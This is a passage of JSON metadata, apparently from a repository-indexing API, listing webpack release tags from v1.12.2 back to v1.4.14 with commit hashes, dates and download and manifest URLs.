ebpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"